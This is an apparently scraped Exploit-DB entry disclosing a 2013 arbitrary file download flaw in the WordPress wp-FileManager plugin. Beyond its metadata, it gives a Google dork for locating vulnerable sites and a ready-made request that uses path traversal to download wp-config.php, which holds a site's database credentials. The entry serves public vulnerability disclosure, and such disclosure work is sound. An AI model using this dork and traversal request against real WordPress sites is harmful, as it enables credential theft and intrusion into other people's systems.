EXPLOITS

WordPress Plugin wp-FileManager - Arbitrary File Download

Author: ByEge
type: webapps
platform: php
port: 
date_added: 2013-05-14  
date_updated: 2013-05-15  
verified: 1  
codes: OSVDB-93446  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt25500/screen-shot-2013-05-15-at-83506-am.png  
application_url: http://www.exploit-db.comwp-filemanager.1.3.0.zip  

raw file: 25440.txt  

Title: Wordpress wp-FileManager Local File Download Vulnerability
Author: ByEge
Download: http://wordpress.org/extend/plugins/wp-filemanager/
Test Platform: Linux
Images: http://j1305.hizliresim.com/19/f/n0xxf.jpg
Vuln. Plat.: Web Application



Google Dorks: inurl:wp-content/plugins/wp-filemanager/
Test : http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download

# Exploit-DB Note:
# In order for this to work, the "Allow Download" setting must be checked in the FileManager's settings.